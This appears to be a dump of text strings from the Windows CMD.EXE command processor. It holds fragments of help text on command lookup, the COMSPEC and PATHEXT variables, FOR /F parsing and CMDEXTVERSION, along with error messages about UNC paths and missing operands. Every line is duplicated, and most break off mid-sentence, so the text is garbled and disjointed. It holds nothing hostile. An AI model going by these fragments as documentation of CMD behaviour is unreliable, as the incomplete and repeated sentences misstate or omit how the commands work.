launch the application associated with the .DOC file extension).
When executing an application that is a 32-bit GUI application, CMD.EXE
When executing an application that is a 32-bit GUI application, CMD.EXE
the command prompt. This new behavior does NOT occur if executing
the command prompt. This new behavior does NOT occur if executing
When executing a command line whose first token is the string "CMD "
When executing a command line whose first token is the string "CMD "
without an extension or path qualifier, then "CMD" is replaced with
without an extension or path qualifier, then "CMD" is replaced with
the value of the COMSPEC variable. This prevents picking up CMD.EXE
the value of the COMSPEC variable. This prevents picking up CMD.EXE
When executing a command line whose first token does NOT contain an
When executing a command line whose first token does NOT contain an
extension, then CMD.EXE uses the value of the PATHEXT
extension, then CMD.EXE uses the value of the PATHEXT
.COM;.EXE;.BAT;.CMD
.COM;.EXE;.BAT;.CMD
When searching for an executable, if there is no match on any extension,
When searching for an executable, if there is no match on any extension,
If Command Extensions are enabled, and running on the Windows XP
If Command Extensions are enabled, and running on the Windows XP
forms of the FOR command are supported:
forms of the FOR command are supported:
Walks the directory tree rooted at [drive:]path, executing the FOR
Walks the directory tree rooted at [drive:]path, executing the FOR
passes the first blank separated token from each line of each file.
passes the first blank separated token from each line of each file.
is a quoted string which contains one or more keywords to specify
is a quoted string which contains one or more keywords to specify
different parsing options. The keywords are:
different parsing options. The keywords are:
be passed to the for body for each iteration.
be passed to the for body for each iteration.
where a back quoted string is executed as a
where a back quoted string is executed as a
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
would parse each line in myfile.txt, ignoring lines that begin with
would parse each line in myfile.txt, ignoring lines that begin with
a semicolon, passing the 2nd and 3rd token from each line to the for
a semicolon, passing the 2nd and 3rd token from each line to the for
line, which is passed to a child CMD.EXE and the output is captured
line, which is passed to a child CMD.EXE and the output is captured
IF CMDEXTVERSION number command
IF CMDEXTVERSION number command
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
CMDEXTVERSION conditional is never true when Command Extensions are
CMDEXTVERSION conditional is never true when Command Extensions are
%%CMDCMDLINE%% will expand into the original command line passed to
%%CMDCMDLINE%% will expand into the original command line passed to
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
already an environment variable with the name CMDCMDLINE, in which case
already an environment variable with the name CMDCMDLINE, in which case
%%CMDEXTVERSION%% will expand into a string representation of the
%%CMDEXTVERSION%% will expand into a string representation of the
current value of CMDEXTVERSION, provided that there is not already
current value of CMDEXTVERSION, provided that there is not already
an environment variable with the name CMDEXTVERSION, in which case you
an environment variable with the name CMDEXTVERSION, in which case you
under Windows XP, as command line editing is always enabled.
under Windows XP, as command line editing is always enabled.
CMD.EXE was started with the above path as the current directory.
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
UNC paths are not supported. Defaulting to Windows directory.
CMD does not support UNC paths as current directories.
CMD does not support UNC paths as current directories.
UNC paths not supported for current directory. Using
UNC paths not supported for current directory. Using
to create temporary drive letter to support UNC current
to create temporary drive letter to support UNC current
Missing operand.
Missing operand.
Missing operator.
Missing operator.
The COMSPEC environment variable does not point to CMD.EXE.
The COMSPEC environment variable does not point to CMD.EXE.
The FAT File System only support Last Write Times
The FAT File System only support Last Write Times
of a batch script is reached, an implied ENDLOCAL is executed for any
of a batch script is reached, an implied ENDLOCAL is executed for any
application execution.
application execution.
The switch /Y may be present in the COPYCMD environment variable.
The switch /Y may be present in the COPYCMD environment variable.
to prompt on overwrites unless MOVE command is being executed from
to prompt on overwrites unless MOVE command is being executed from
when CMD.EXE started. This value either comes from the current console
when CMD.EXE started. This value either comes from the current console
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute